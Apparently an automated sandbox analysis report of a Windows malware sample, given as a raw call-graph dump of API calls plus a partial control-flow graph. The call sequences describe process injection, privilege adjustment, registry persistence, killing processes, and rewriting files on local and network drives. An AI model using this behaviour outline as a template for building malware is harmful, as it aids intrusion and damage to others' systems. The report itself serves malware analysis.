12844cb InterlockedExchange 8469->8470 8470->8469 8471->8434 8472->8438 8473->8420 8474->8445 8475->8449 8476->8453 8477->8462 8479 1288fae 8478->8479 8480 12890b5 8478->8480 8481 1288fbc RegEnumValueA 8479->8481 8482 1288ff3 8479->8482 8484 1288ff5 RegDeleteValueA 8479->8484 8480->7448 8481->8479 8481->8482 8483 128901d RegEnumKeyExA 8482->8483 8486 1289050 8482->8486 8487 1289052 wsprintfA 8482->8487 8488 1289084 RegDeleteKeyA 8482->8488 8483->8482 8485 12890ab RegCloseKey 8483->8485 8484->8481 8485->8480 8486->8485 8487->8482 8488->8483 8490 1289342 lstrcat 8489->8490 8491 1289354 lstrcat lstrcat 8489->8491 8490->8491 8492 128938a 8491->8492 8492->7470 8494 12891ae 8493->8494 8495 12891b5 CloseHandle 8493->8495 8494->8495 8495->7476 8498 1289258 8496->8498 8497 12892d9 SetFileAttributesA DeleteFileA 8497->7477 8498->8497 8500 128978e lstrcat 8499->8500 8501 12897a0 8499->8501 8500->8501 8502 12897c4 GlobalAlloc 8501->8502 8504 12897f6 8501->8504 8503 12897f1 8502->8503 8503->8504 8505 1289805 lstrcat 8503->8505 8504->7450 8504->7485 8506 128a75a 10 API calls 8505->8506 8507 128984d 
CopyFileA 8506->8507 8508 128986a LoadLibraryExA 8507->8508 8509 1289881 8507->8509 8508->8509 8510 128988a LoadLibraryExA 8509->8510 8511 12898b1 GlobalFree GetProcAddress 8509->8511 8510->8504 8510->8511 8511->8504 8512 12898e7 8511->8512 8512->8504 8513 1289997 GlobalAlloc 8512->8513 8514 12899d1 CreateFileA 8513->8514 8514->8504 8516 1289a62 WriteFile CloseHandle GlobalFree FreeLibrary 8514->8516 8516->8504 8517 1289ab8 DeleteFileA 8516->8517 8517->8504 8519 1289ec1 8518->8519 8520 1289edc RtlExitUserThread 8519->8520 8531 1289c4f CreateToolhelp32Snapshot 8519->8531 8522 1289ecf Sleep 8522->8519 8529 128944d 8523->8529 8524 1289459 Sleep 8524->8529 8525 12894c7 RtlExitUserThread 8526 12894ba Sleep 8526->8529 8527 128948a lstrlen 8527->8526 8527->8529 8529->8524 8529->8525 8529->8526 8529->8527 8530 128946d Sleep 8529->8530 8530->8529 8532 1289eac CloseHandle 8531->8532 8533 1289cac Process32First 8531->8533 8532->8522 8534 1289db8 Process32Next 8533->8534 8535 1289cea CharUpperA 8533->8535 8534->8532 8536 1289dd3 CharUpperA 8534->8536 8539 1289d03 8535->8539 8538 1289df2 8536->8538 8537 1289d71 8537->8534 8556 1289b56 CreateToolhelp32Snapshot Module32First 8537->8556 8538->8534 8540 1289b56 5 API calls 8538->8540 8544 1289acf 6 API calls 8538->8544 8549 1289acf 6 API calls 8538->8549 8539->8537 8551 1289acf CreateFileA 8539->8551 8540->8538 8542 1289d8b 8542->8534 8545 1289acf 6 API calls 8542->8545 8547 1289e11 Sleep 8544->8547 8548 1289d9e Sleep 8545->8548 8547->8534 8548->8534 8550 1289e89 Sleep 8549->8550 8550->8538 8552 1289b00 OpenProcess 8551->8552 8553 1289b32 WriteFile CloseHandle 8551->8553 8554 1289b1a TerminateProcess CloseHandle 8552->8554 8555 1289b30 Sleep 8552->8555 8553->8555 8554->8555 8555->8537 8557 1289c37 CloseHandle 8556->8557 8560 1289bce 8556->8560 8557->8542 8558 1289c20 Module32Next 8558->8557 8558->8560 8559 1289bd7 CharUpperA 8559->8560 8560->8558 8560->8559 8561 1289c14 8560->8561 8561->8557 8563 129276d CloseHandle 8562->8563 8564 
129255d Process32First 8562->8564 8563->7495 8565 129266f Process32Next 8564->8565 8566 1292591 8564->8566 8565->8563 8567 129268a 8565->8567 8566->8565 8568 129259e lstrlen 8566->8568 8567->8565 8569 1292697 lstrlen 8567->8569 8580 1291ef6 8567->8580 8570 12925c8 lstrcpy 8568->8570 8571 12925b0 lstrcpyn 8568->8571 8573 12926a9 lstrcpyn 8569->8573 8574 12926c1 lstrcpy 8569->8574 8572 12925dc 7 API calls 8570->8572 8571->8572 8572->8565 8575 1292659 8572->8575 8576 12926d5 7 API calls 8573->8576 8574->8576 8577 1291ef6 38 API calls 8575->8577 8576->8567 8578 129266c 8577->8578 8578->8565 8581 1298060 8580->8581 8582 1291f20 OpenProcess 8581->8582 8583 1291ffa GetLastError 8582->8583 8584 12921a7 OpenProcessToken 8582->8584 8585 1292009 GetVersionExA 8583->8585 8622 1292042 8583->8622 8586 12921cd GetTokenInformation 8584->8586 8584->8622 8587 129204e GetCurrentThread OpenThreadToken 8585->8587 8585->8622 8588 12921f7 GetLastError 8586->8588 8586->8622 8591 12920b3 LookupPrivilegeValueA AdjustTokenPrivileges 8587->8591 8592 1292074 GetLastError 8587->8592 8593 129220e GetProcessHeap RtlAllocateHeap 8588->8593 8588->8622 8589 12924cb 8594 12924e1 8589->8594 8595 12924d4 CloseHandle 8589->8595 8590 12924b4 CloseHandle 8590->8589 8598 129211e GetLastError 8591->8598 8599 1292105 CloseHandle 8591->8599 8596 129208d GetCurrentProcess OpenProcessToken 8592->8596 8592->8622 8597 129223f GetTokenInformation 8593->8597 8593->8622 8600 12924ea GetProcessHeap HeapFree 8594->8600 8601 1292500 8594->8601 8595->8594 8596->8591 8596->8622 8602 1292273 LookupAccountSidA 8597->8602 8597->8622 8603 129212b CloseHandle 8598->8603 8604 1292144 OpenProcess AdjustTokenPrivileges CloseHandle 8598->8604 8599->8622 8600->8601 8601->8567 8605 12922c7 8602->8605 8602->8622 8603->8622 8606 1292199 8604->8606 8604->8622 8607 12922d2 lstrcmpiA 8605->8607 8605->8622 8606->8584 8608 12922e8 lstrcmpiA 8607->8608 8609 1292314 CreateMutexA 8607->8609 8608->8609 8610 12922fe lstrcmpiA 8608->8610 
8609->8622 8610->8609 8611 129232e VirtualAllocEx 8610->8611 8613 12923cd VirtualAllocEx 8611->8613 8614 1292366 WriteProcessMemory 8611->8614 8616 12923fb 8613->8616 8613->8622 8615 1292398 CreateRemoteThread 8614->8615 8614->8622 8617 12923c6 8615->8617 8615->8622 8618 129240e lstrlen 8616->8618 8617->8613 8619 129772b 8618->8619 8620 129242c WriteProcessMemory 8619->8620 8621 1292460 CreateRemoteThread 8620->8621 8620->8622 8621->8622 8622->8589 8622->8590 8624 1298060 8623->8624 8625 12884ce InterlockedIncrement htons 8624->8625 8626 128857b 8625->8626 8643 128719b 8626->8643 8629 12886ba 8634 12886e5 InterlockedDecrement RtlExitUserThread 8629->8634 8630 12885a2 GetTickCount 8631 12885f5 8630->8631 8632 12885de 8630->8632 8633 1288651 8631->8633 8636 128862a 8631->8636 8658 1287f11 htons 8631->8658 8635 128719b 38 API calls 8632->8635 8637 1288673 8633->8637 8676 1287523 8633->8676 8635->8631 8636->8633 8664 12882b6 htons 8636->8664 8640 12886b5 8637->8640 8688 1286ebe 8637->8688 8640->8634 8644 1298060 8643->8644 8645 12871a8 socket 8644->8645 8646 128721c 8645->8646 8656 128734f 8645->8656 8647 1286981 InterlockedExchange 8646->8647 8650 128723a 8647->8650 8648 1287513 8648->8629 8648->8630 8649 1287506 closesocket 8649->8648 8651 1287250 sendto 8650->8651 8650->8656 8652 128727c select 8651->8652 8651->8656 8654 1287354 recvfrom 8652->8654 8652->8656 8655 128738d 8654->8655 8654->8656 8655->8656 8657 1286330 32 API calls 8655->8657 8656->8648 8656->8649 8657->8656 8659 1287f5f 8658->8659 8703 1287c4e socket 8659->8703 8662 1287f9b closesocket 8662->8636 8663 1287f7c send 8663->8662 8665 1288336 8664->8665 8719 12844cb InterlockedExchange 8665->8719 8667 128833e GetTickCount 8668 1287c4e 10 API calls 8667->8668 8669 1288368 8668->8669 8670 128837a send 8669->8670 8671 12883a2 8669->8671 8670->8671 8672 1288394 8670->8672 8673 12883c4 8671->8673 8675 12883b7 closesocket 8671->8675 8720 128811c 8672->8720 8673->8633 8675->8673 8677 1298060 8676->8677 8678 
1287530 socket 8677->8678 8679 1286981 InterlockedExchange 8678->8679 8680 128759e 8679->8680 8681 12876b3 8680->8681 8682 12875b4 sendto 8680->8682 8683 128776e 8681->8683 8684 1287761 closesocket 8681->8684 8682->8681 8685 12875e0 select 8682->8685 8683->8637 8684->8683 8685->8681 8687 12876b8 recvfrom 8685->8687 8687->8681 8689 1298060 8688->8689 8690 1286ecb socket 8689->8690 8691 128705c 8690->8691 8692 1286f35 8690->8692 8694 128718b 8691->8694 8695 128717e closesocket 8691->8695 8693 1286981 InterlockedExchange 8692->8693 8696 1286f47 8693->8696 8694->8640 8695->8694 8696->8691 8697 1286f5d sendto 8696->8697 8697->8691 8698 1286f89 select 8697->8698 8698->8691 8700 1287061 recvfrom 8698->8700 8700->8691 8701 128709a 8700->8701 8701->8691 8702 1285e86 2 API calls 8701->8702 8702->8691 8704 1287c98 8703->8704 8705 1287ca1 8703->8705 8704->8705 8706 1287ca8 ioctlsocket 8704->8706 8705->8662 8705->8663 8707 1287cde connect 8706->8707 8708 1287d00 8707->8708 8709 1287d05 WSAGetLastError 8707->8709 8711 1287ec9 ioctlsocket 8708->8711 8710 1287d1d Sleep 8709->8710 8713 1287d27 8709->8713 8710->8707 8711->8705 8714 1287e58 select 8713->8714 8716 1287d35 closesocket 8713->8716 8715 1287e8e 8714->8715 8714->8716 8715->8716 8717 1287e99 __WSAFDIsSet 8715->8717 8716->8705 8717->8716 8718 1287eb0 __WSAFDIsSet 8717->8718 8718->8711 8718->8716 8719->8667 8735 1287fa9 8720->8735 8723 128824d 8725 1288289 8723->8725 8728 128827f closesocket 8723->8728 8724 128824f 8724->8723 8727 1288255 send 8724->8727 8725->8671 8726 1288192 GlobalAlloc 8730 12881c2 8726->8730 8727->8723 8728->8725 8729 12881d7 recv 8729->8730 8731 1288204 8729->8731 8730->8729 8730->8731 8732 1288234 8731->8732 8734 1286330 32 API calls 8731->8734 8732->8723 8733 1288240 GlobalFree 8732->8733 8733->8723 8734->8732 8738 1287fd3 8735->8738 8736 12880e6 recv 8737 12880e4 8736->8737 8737->8723 8737->8724 8737->8726 8738->8736 8738->8737 8739 128809c select 8738->8739 8739->8736 8739->8737 8741 128811c 39 API 
calls 8740->8741 8742 12882a3 RtlExitUserThread 8741->8742 8744 1287a1f GlobalFree RtlExitUserThread 8743->8744 8745 12877b5 8743->8745 8745->8744 8746 12878ff 8745->8746 8747 1287824 8745->8747 8748 128794b 8746->8748 8749 128790b 8746->8749 8750 128784f htons 8747->8750 8748->8744 8768 1286330 32 API calls 8748->8768 8770 1287999 8748->8770 8751 1286981 InterlockedExchange 8749->8751 8752 128719b 38 API calls 8750->8752 8753 128791a 8751->8753 8756 1287875 8752->8756 8757 1287926 sendto 8753->8757 8775 12878f7 8753->8775 8754 12879e4 8761 1286981 InterlockedExchange 8754->8761 8755 12879a7 8758 1286981 InterlockedExchange 8755->8758 8759 128787c 8756->8759 8760 1287895 8756->8760 8757->8775 8763 12879b6 8758->8763 8764 1286981 InterlockedExchange 8759->8764 8762 1286981 InterlockedExchange 8760->8762 8765 12879f3 8761->8765 8767 128788d 8762->8767 8769 12879c2 sendto 8763->8769 8763->8775 8764->8767 8765->8744 8766 12879ff sendto 8765->8766 8766->8744 8771 12878d0 8767->8771 8772 12878b0 sendto 8767->8772 8768->8770 8769->8775 8770->8754 8770->8755 8773 12878d6 htons 8771->8773 8771->8775 8772->8771 8774 1285e86 2 API calls 8773->8774 8774->8775 8775->8744 8856 130d760 8858 130d765 8856->8858 8859 130d78b LoadLibraryExA 8858->8859 8868 130d778 __common_dcos_data 8858->8868 8861 130d9c0 __common_dcos_data 7 API calls 8859->8861 8862 130d83c 8861->8862 8886 130d9c5 8862->8886 8866 130d7cf GetModuleFileNameA 8869 130d9a0 Sleep 8866->8869 8870 130d93f LoadLibraryExA GetProcAddress 8866->8870 8867 130d896 MapViewOfFile 8867->8866 8868->8866 8877 130d9c0 8868->8877 8872 130d9ab ExitProcess 8869->8872 8870->8869 8871 130d96c CreateMutexA GetLastError 8870->8871 8871->8869 8871->8872 8874 130d803 __common_dcos_data 8876 130d9c0 __common_dcos_data 7 API calls 8874->8876 8876->8859 8878 130d9c4 8877->8878 8879 130d91a GetModuleFileNameA 8877->8879 8878->8874 8881 130d9a0 Sleep 8879->8881 8882 130d93f LoadLibraryExA GetProcAddress 8879->8882 8884 130d9ab ExitProcess 
8881->8884 8882->8881 8883 130d96c CreateMutexA GetLastError 8882->8883 8883->8881 8883->8884 8887 130d9c9 8886->8887 8887->8886 8887->8887 8888 130d9cc GetProcAddress 8887->8888 8890 130d853 SetErrorMode CreateFileMappingA CreateFileMappingA 8887->8890 8889 130d9c0 __common_dcos_data 7 API calls 8888->8889 8889->8887 8890->8866 8890->8867 8787 1293238 8803 12931f9 8787->8803 8788 1293734 Sleep 8788->8803 8789 1293278 GetDriveTypeA 8790 12932bc lstrcat CreateFileA 8789->8790 8789->8803 8793 12932ff GetFileTime FileTimeToSystemTime 8790->8793 8794 1293522 GetFileAttributesA 8790->8794 8791 1293744 RtlExitUserThread 8798 129333d 8793->8798 8799 1293515 CloseHandle 8793->8799 8796 1293569 CreateFileA 8794->8796 8797 129353e SetFileAttributesA DeleteFileA 8794->8797 8795 1292ebc 11 API calls 8800 129320b Sleep GetLogicalDrives 8795->8800 8802 1293598 GetSystemTime SystemTimeToFileTime 8796->8802 8796->8803 8816 128a2ad SHFileOperation RemoveDirectoryA 8797->8816 8798->8799 8805 1293372 ReadFile CharLowerA lstrlen 8798->8805 8813 1293465 lstrcpy GetFileAttributesA 8798->8813 8799->8794 8800->8803 8804 128a16b 2 API calls 8802->8804 8803->8788 8803->8789 8803->8791 8803->8795 8803->8796 8807 1293605 8804->8807 8805->8798 8808 129361f lstrcat 8807->8808 8809 1293633 lstrcat 8807->8809 8810 1292b8e 18 API calls 8807->8810 8817 12844cb InterlockedExchange 8807->8817 8808->8807 8809->8807 8811 1293658 6 API calls 8810->8811 8811->8803 8812 12936ef WriteFile CloseHandle SetFileAttributesA 8811->8812 8812->8803 8813->8798 8814 1293491 CloseHandle CreateFileA 8813->8814 8814->8798 8815 12934c9 WriteFile CloseHandle SetFileAttributesA 8814->8815 8815->8798 8816->8803 8817->8807 9007 1284bf9 9008 1284c08 9007->9008 9009 1284d68 RegCloseKey 9008->9009 9010 1284c15 wsprintfA 9008->9010 9011 1284d75 9009->9011 9012 1284c6d 9010->9012 9013 1284c60 9010->9013 9016 1284d13 RegSetValueExA 9012->9016 9017 1284d36 lstrlen RegSetValueExA 9012->9017 9013->9012 9014 1284cbc 9013->9014 9015 
1284ce5 9013->9015 9019 1284a5b 2 API calls 9014->9019 9020 1284a5b 2 API calls 9015->9020 9018 1284d63 9016->9018 9017->9018 9021 1284cd2 lstrcpy 9019->9021 9022 1284cf9 lstrcpy 9020->9022 9021->9012 9022->9012 8909 12890ba CreateFileA 8910 12890f2 8909->8910 8911 12890f4 WriteFile CloseHandle 8909->8911 8911->8910 8913 1291ab1 8917 1291a5a 8913->8917 8914 1291acf 8916 1291c77 8914->8916 8919 1291c51 8914->8919 8920 1291b14 lstrcpy lstrcat 8914->8920 8915 1291c8d Sleep 8915->8917 8917->8914 8917->8915 8918 1291c9d GlobalFree WNetCloseEnum 8917->8918 8925 1291a79 WNetEnumResourceA 8917->8925 8921 1291ccd 8918->8921 8923 129195d 121 API calls 8919->8923 8922 1290b9a 7 API calls 8920->8922 8927 1291b47 8922->8927 8924 1291c69 Sleep 8923->8924 8924->8916 8925->8917 8926 1291c7e GetLastError 8925->8926 8926->8915 8928 1291c8b 8926->8928 8927->8919 8929 1291b6b lstrcpy lstrlen 8927->8929 8930 1291be3 8927->8930 8928->8918 8932 1291ba8 lstrlen 8929->8932 8933 1291b96 lstrcat 8929->8933 8931 1291c38 8930->8931 8937 1291c0f lstrlen 8930->8937 8931->8919 8935 1291c44 DeleteFileA 8931->8935 8934 128a16b 2 API calls 8932->8934 8933->8932 8936 1291bc2 lstrcat 8934->8936 8935->8919 8938 1290c4b 5 API calls 8936->8938 8939 1291060 91 API calls 8937->8939 8938->8930 8939->8931 8940 12844b1 8943 12844bb GetTickCount 8940->8943 8942 12844b9 8943->8942 9023 1288bf1 9034 1288a39 9023->9034 9024 1288d8d Sleep 9024->9034 9025 1288da5 Sleep 9025->9034 9026 1288cae lstrcpy 9026->9034 9027 1288db5 RtlExitUserThread 9029 1288bab Sleep 9029->9034 9030 128a75a 10 API calls 9030->9034 9031 1290945 18 API calls 9031->9034 9032 1288b2a IsBadWritePtr 9032->9034 9033 12914d9 28 API calls 9033->9034 9034->9024 9034->9025 9034->9026 9034->9027 9034->9029 9034->9030 9034->9031 9034->9032 9034->9033 9035 12845d2 4 API calls 9034->9035 9036 1284631 3 API calls 9034->9036 9035->9034 9037 1288b86 Sleep 9036->9037 9037->9034 9038 12888f3 9039 128890a inet_addr 9038->9039 9040 1288906 9038->9040 9041 
128891d 9039->9041 9042 128892e gethostbyname 9039->9042 9041->9040 9041->9042 9042->9040 8820 1284f36 8821 1284f45 8820->8821 8822 1284f52 wsprintfA 8821->8822 8823 1285085 RegCloseKey 8821->8823 8824 1284f9c 8822->8824 8829 1284fa9 8822->8829 8836 12850d2 8823->8836 8827 1284fe5 8824->8827 8828 1285007 8824->8828 8824->8829 8831 1285215 8824->8831 8825 1285030 RegSetValueExA 8830 1285080 8825->8830 8826 1285053 lstrlen RegSetValueExA 8826->8830 8832 1284a5b 2 API calls 8827->8832 8833 1284a5b 2 API calls 8828->8833 8829->8825 8829->8826 8835 1284ff4 lstrcpy 8832->8835 8834 1285016 lstrcpy 8833->8834 8834->8829 8835->8829 8837 12850f9 GlobalFree 8836->8837 8838 1285106 8836->8838 8837->8838 8950 1292c88 8951 1292c97 8950->8951 8952 1292e04 8951->8952 8953 1292ca4 8951->8953 8981 12844cb InterlockedExchange 8952->8981 8977 12844cb InterlockedExchange 8953->8977 8956 1292e09 8957 1292e24 8956->8957 8958 1292a35 10 API calls 8956->8958 8958->8957 8959 1292dff 8960 1292ca9 8960->8959 8978 12844cb InterlockedExchange 8960->8978 8962 1292cf4 8963 1292d12 lstrcpy 8962->8963 8965 1292a35 10 API calls 8962->8965 8964 1292962 InterlockedExchange 8963->8964 8968 1292d44 8964->8968 8966 1292d0f 8965->8966 8966->8963 8967 1292dee lstrcat 8967->8959 8968->8967 8979 12844cb InterlockedExchange 8968->8979 8970 1292d68 8971 1292d7a lstrcat 8970->8971 8972 1292d8c lstrcat 8970->8972 8971->8972 8980 12844cb InterlockedExchange 8972->8980 8974 1292da3 8975 1292db5 lstrcat 8974->8975 8976 1292dc7 lstrlen wsprintfA 8974->8976 8975->8976 8976->8967 8977->8960 8978->8962 8979->8970 8980->8974 8981->8956 9043 128b3c9 9044 128b3db 9043->9044 9045 128b3d3 9043->9045 9046 1284503 InterlockedExchange 9044->9046 9046->9045 9047 1288ec9 9048 1288ee2 9047->9048 9049 1288f2f lstrcpyn 9048->9049 9050 1288f47 9048->9050 9049->9050 9051 1287fca 9054 1287fd3 9051->9054 9052 12880e4 9053 12880e6 recv 9053->9052 9054->9052 9054->9053 9055 128809c select 9054->9055 9055->9052 9055->9053 9056 12908ce 
9057 12908d8 9056->9057 9058 12908ef RtlLeaveCriticalSection 9057->9058 9059 12908de GlobalFree 9057->9059 9060 129090a Sleep 9058->9060 9061 1290915 9058->9061 9059->9058 9060->9061 9062 1288dc4 9063 1288dce RtlExitUserThread 9062->9063 8891 130d440 8892 130d760 8891->8892 8893 130d765 __common_dcos_data 20 API calls 8892->8893 7065 1317ac0 7066 1317ad8 7065->7066 7067 1317bf2 LoadLibraryA 7066->7067 7072 1317c37 VirtualProtect VirtualProtect 7066->7072 7068 1317c09 7067->7068 7068->7066 7071 1317c1b GetProcAddress 7068->7071 7070 1317c9c 7070->7070 7071->7068 7073 1317c31 ExitProcess 7071->7073 7072->7070 7074 5b30000 7076 5b30005 7074->7076 7083 5b30018 7076->7083 7096 5b3002b LoadLibraryExA 7076->7096 7081 5b3006f GetModuleFileNameA 7087 5b30240 Sleep 7081->7087 7088 5b301df LoadLibraryExA GetProcAddress 7081->7088 7083->7081 7091 5b30260 7 API calls 7083->7091 7085 5b30170 CreateThread 7085->7081 7111 5b306d1 7085->7111 7086 5b30136 MapViewOfFile 7086->7085 7089 5b3014c 7086->7089 7090 5b3024b ExitProcess 7087->7090 7088->7087 7092 5b3020c CreateMutexA GetLastError 7088->7092 7089->7085 7094 5b300a3 7091->7094 7092->7087 7092->7090 7095 5b30260 7 API calls 7094->7095 7095->7096 7097 5b30260 7096->7097 7098 5b300dc 7097->7098 7099 5b301ba GetModuleFileNameA 7097->7099 7106 5b30265 7098->7106 7101 5b30240 Sleep 7099->7101 7102 5b301df LoadLibraryExA GetProcAddress 7099->7102 7103 5b3024b ExitProcess 7101->7103 7102->7101 7104 5b3020c CreateMutexA GetLastError 7102->7104 7104->7101 7104->7103 7107 5b30269 7106->7107 7107->7106 7107->7107 7108 5b3026c GetProcAddress 7107->7108 7110 5b300f3 SetErrorMode CreateFileMappingA CreateFileMappingA 7107->7110 7109 5b30260 7 API calls 7108->7109 7109->7107 7110->7085 7110->7086 7112 5b307e0 CreateMutexA 7111->7112 7113 5b306e5 7111->7113 7112->7113 7113->7112 7114 5b30809 Sleep 7113->7114 7115 5b30816 7113->7115 7114->7112 8839 128511e 8840 128512d 8839->8840 8841 128513a wsprintfA 8840->8841 8847 128529e 8840->8847 8842 
12851a0 RegQueryValueExA 8841->8842 8843 1285165 RegQueryValueExA 8841->8843 8846 1285199 8842->8846 8843->8846 8844 1285440 8845 1285433 RegCloseKey 8845->8844 8848 1286330 32 API calls 8847->8848 8849 1285403 8847->8849 8848->8849 8849->8844 8849->8845 9064 12933df 9069 129333d 9064->9069 9065 1293515 CloseHandle 9066 1293522 GetFileAttributesA 9065->9066 9067 1293569 CreateFileA 9066->9067 9068 129353e SetFileAttributesA DeleteFileA 9066->9068 9072 1293598 GetSystemTime SystemTimeToFileTime 9067->9072 9074 12931f9 9067->9074 9093 128a2ad SHFileOperation RemoveDirectoryA 9068->9093 9069->9065 9070 1293465 lstrcpy GetFileAttributesA 9069->9070 9092 1293372 ReadFile CharLowerA lstrlen 9069->9092 9070->9069 9073 1293491 CloseHandle CreateFileA 9070->9073 9075 128a16b 2 API calls 9072->9075 9073->9069 9076 12934c9 WriteFile CloseHandle SetFileAttributesA 9073->9076 9074->9067 9077 1293734 Sleep 9074->9077 9079 1293744 RtlExitUserThread 9074->9079 9081 1292ebc 11 API calls 9074->9081 9088 1293278 GetDriveTypeA 9074->9088 9085 1293605 9075->9085 9076->9069 9077->9074 9084 129320b Sleep GetLogicalDrives 9081->9084 9082 129361f lstrcat 9082->9085 9083 1293633 lstrcat 9083->9085 9084->9074 9085->9082 9085->9083 9086 1292b8e 18 API calls 9085->9086 9094 12844cb InterlockedExchange 9085->9094 9087 1293658 6 API calls 9086->9087 9087->9074 9089 12936ef WriteFile CloseHandle SetFileAttributesA 9087->9089 9088->9074 9090 12932bc lstrcat CreateFileA 9088->9090 9089->9074 9090->9066 9091 12932ff GetFileTime FileTimeToSystemTime 9090->9091 9091->9065 9091->9069 9092->9069 9093->9074 9094->9085 7116 4fd0000 7119 4fd015d 7116->7119 7118 4fd00ce 7118->7118 7123 4fd0172 7119->7123 7120 4fd0184 WSASocketA 7121 4fd01a0 connect 7120->7121 7122 4fd01b9 recv 7121->7122 7121->7123 7122->7123 7123->7120 7123->7121 7123->7122 7124 4fd021f 7123->7124 7124->7118 9095 128f8d6 9096 128f8e5 9095->9096 9097 128f925 9096->9097 9098 128cd03 2 API calls 9096->9098 9099 128f9a1 9097->9099 9102 128cd03 
2 API calls 9097->9102 9098->9097 9100 128f9f8 9099->9100 9103 128cd03 2 API calls 9099->9103 9154 12844cb InterlockedExchange 9100->9154 9102->9099 9103->9100 9104 128fa0e 9105 128fa55 9104->9105 9155 12844cb InterlockedExchange 9104->9155 9156 12844cb InterlockedExchange 9105->9156 9108 128fa82 9109 128cd03 2 API calls 9108->9109 9110 128fad5 9108->9110 9109->9110 9111 128cd03 2 API calls 9110->9111 9112 128fb50 9110->9112 9111->9112 9113 128c76b 2 API calls 9112->9113 9116 128fb9e 9112->9116 9113->9116 9114 128fc7e 9157 12844cb InterlockedExchange 9114->9157 9116->9114 9117 128cd03 2 API calls 9116->9117 9117->9114 9118 128fc94 9119 128fd1f 9118->9119 9120 128fd5c 9118->9120 9123 128cd03 2 API calls 9118->9123 9121 128b3ef InterlockedExchange 9119->9121 9122 128d34d 2 API calls 9120->9122 9132 128fdea 9120->9132 9121->9120 9124 128fe63 9122->9124 9123->9119 9124->9132 9133 128c89a 2 API calls 9124->9133 9125 12907db CloseHandle 9126 129088b CloseHandle SetFileAttributesA 9125->9126 9127 12907f5 SetFilePointer SetEndOfFile 9125->9127 9130 12908af 9126->9130 9131 12908b5 DeleteFileA 9126->9131 9128 129082b 9127->9128 9129 1290852 9127->9129 9128->9129 9134 1290831 WriteFile 9128->9134 9135 1290869 SetFileTime 9129->9135 9136 1290858 GlobalFree 9129->9136 9130->9131 9137 12908bf 9130->9137 9131->9137 9132->9125 9138 12907d1 UnmapViewOfFile 9132->9138 9139 1290793 GlobalAlloc 9132->9139 9140 12905ed 9132->9140 9146 128fe88 9133->9146 9134->9129 9135->9126 9136->9135 9141 12908ef RtlLeaveCriticalSection 9137->9141 9142 12908de GlobalFree 9137->9142 9138->9125 9139->9140 9140->9138 9143 129090a Sleep 9141->9143 9144 1290915 9141->9144 9142->9141 9143->9144 9145 1286981 InterlockedExchange 9147 12903c7 9145->9147 9146->9132 9146->9145 9158 12844cb InterlockedExchange 9147->9158 9149 12904ed GetTickCount 9149->9132 9150 129051a 9149->9150 9159 12844cb InterlockedExchange 9150->9159 9152 129051f 9152->9132 9160 12844cb InterlockedExchange 9152->9160 9154->9104 9155->9104 
9156->9108 9157->9118 9158->9149 9159->9152 9160->9152

Control-flow Graph

• Executed
• Not Executed
                                                                                                                                                                                                                                    control_flow_graph 0 1293b60-1293c26 call 1298060 call 1292ebc LoadLibraryA 5 1293c28-1293c6d GetProcAddress * 3 0->5 6 1293c72-1293c8c LoadLibraryA 0->6 5->6 7 1293c8e-1293cec GetProcAddress * 4 6->7 8 1293cf1-1293d13 RegOpenKeyExA 6->8 7->8 9 1293d4d-1293d6f RegOpenKeyExA 8->9 10 1293d15-1293d47 RegSetValueExA RegCloseKey 8->10 11 1293da9-1293df2 lstrcpy lstrcat RegOpenKeyExA 9->11 12 1293d71-1293da3 RegSetValueExA RegCloseKey 9->12 10->9 13 1293e5f-1293e81 RegOpenKeyExA 11->13 14 1293df4-1293e59 GetModuleFileNameA wsprintfA lstrlen RegSetValueExA RegCloseKey 11->14 12->11 15 1293f15-1293f3a GetWindowsDirectoryA lstrlen 13->15 16 1293e87-1293f0f RegSetValueExA * 3 RegCloseKey 13->16 14->13 17 1293f4c-1293f7a GetComputerNameA lstrlen 15->17 18 1293f3c-1293f46 lstrcat 15->18 16->15 19 1293fc9-1294007 lstrcpy GetUserNameA lstrlen 17->19 20 1293f7c-1293fc2 lstrlen 17->20 18->17 21 1294009-1294017 lstrcpy 19->21 22 129401d-129403d call 129772b 19->22 20->19 21->22 25 129404e-1294061 lstrlen 22->25 26 12940e1-12940f0 call 1290b9a 25->26 27 1294063-129406a 25->27 34 129414d-1294157 lstrcpy 26->34 35 12940f2-1294117 GetTempPathA lstrlen 26->35 27->26 28 129406c-1294099 27->28 30 129409b-12940a4 28->30 31 12940aa-12940dc lstrlen 28->31 30->31 31->25 36 129415d-1294167 34->36 37 1294129-1294138 call 1290b9a 35->37 38 1294119-1294123 lstrcat 35->38 39 1294178-129418b lstrlen 36->39 44 129414b 37->44 45 129413a-1294145 lstrcpy 37->45 38->37 42 129418d-1294194 39->42 43 1294205-1294250 lstrcat CreateFileMappingA call 128477f call 1286274 call 1285760 call 1285c26 39->43 42->43 46 1294196-12941ca 42->46 58 1294331-1294338 call 1285760 43->58 59 1294256-129429b call 128c89a 43->59 44->36 45->44 48 12941db-1294200 lstrlen 46->48 49 12941cc-12941d5 46->49 
48->39 49->48 64 129433b-129435f call 1288701 call 1284d96 call 12855be lstrlen 58->64 65 12942ac-12942b6 59->65 83 1294361 call 128a553 64->83 84 1294366-1294389 64->84 67 12942b8-12942e7 65->67 68 1294325-1294327 call 1285760 65->68 71 12942e9-12942f7 67->71 72 129431e 67->72 73 129432c-129432f 68->73 71->72 75 12942f9-1294320 call 1285e86 71->75 72->68 73->64 75->65 83->84 85 129438b-1294395 84->85 86 1294397-12943c3 call 12844cb GetTickCount wsprintfA 84->86 85->86 88 12943c6 85->88 86->88 91 12943d0-12943e0 88->91 92 12944aa-12944e3 lstrcat GetSystemDirectoryA lstrlen 91->92 93 12943e6-12943f6 91->93 95 12944f5-1294566 lstrcat * 2 GlobalAlloc * 2 92->95 96 12944e5-12944ef lstrcat 92->96 93->92 94 12943fc-129440b 93->94 94->92 98 1294411-1294447 94->98 96->95 99 1294449-1294455 98->99 100 1294457 98->100 101 1294461-12944a1 lstrlen wsprintfA 99->101 100->101 102 12944a3 101->102 103 12944a5 101->103 102->92 103->91
APIs
  • Part of subcall function 01292EBC: RegOpenKeyExA.KERNEL32(80000001,0128244C,00000000,000F003F,?,?), ref: 01292F03
  • Part of subcall function 01292EBC: RegSetValueExA.KERNELBASE(?,01282488,00000000,00000004,00000002,00000004), ref: 01292F31
  • Part of subcall function 01292EBC: RegCloseKey.KERNEL32(?), ref: 01292F3E
  • Part of subcall function 01292EBC: lstrcpy.KERNEL32(00000000,01282550), ref: 01292F99
  • Part of subcall function 01292EBC: lstrcat.KERNEL32(00000000,01282548), ref: 01292FAC
• LoadLibraryA.KERNEL32(01282154), ref: 01293C13
• GetProcAddress.KERNEL32(00000000,0128278C), ref: 01293C36
